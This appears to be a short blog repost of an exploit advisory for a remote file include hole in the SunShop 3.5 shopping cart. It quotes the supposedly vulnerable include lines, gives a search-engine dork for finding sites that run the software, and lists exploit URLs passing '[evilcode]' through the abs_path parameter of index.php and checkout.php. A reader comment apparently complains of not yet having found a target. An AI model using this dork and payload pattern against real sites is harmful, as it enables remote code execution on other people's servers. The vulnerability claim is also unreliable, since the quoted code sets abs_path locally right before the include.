sunshop 3.5 (index.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# scripts : SunShop v3.5
# Discovered By : irvian
# scripts site : http://www.turnkeywebtools.com/sunshop/
# dork : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:
index.php
$abs_path = dirname(__FILE__);
include $abs_path."/global.php";
checkout.php
$abs_path = dirname(__FILE__);
include $abs_path."/global.php";
Exploit:
target.com/index.php?abs_path=[evilcode]
target.com/checkout.php?abs_path=[evilcode]
1 komentar:
Aku rung oleh targete syuuu...
Post a Comment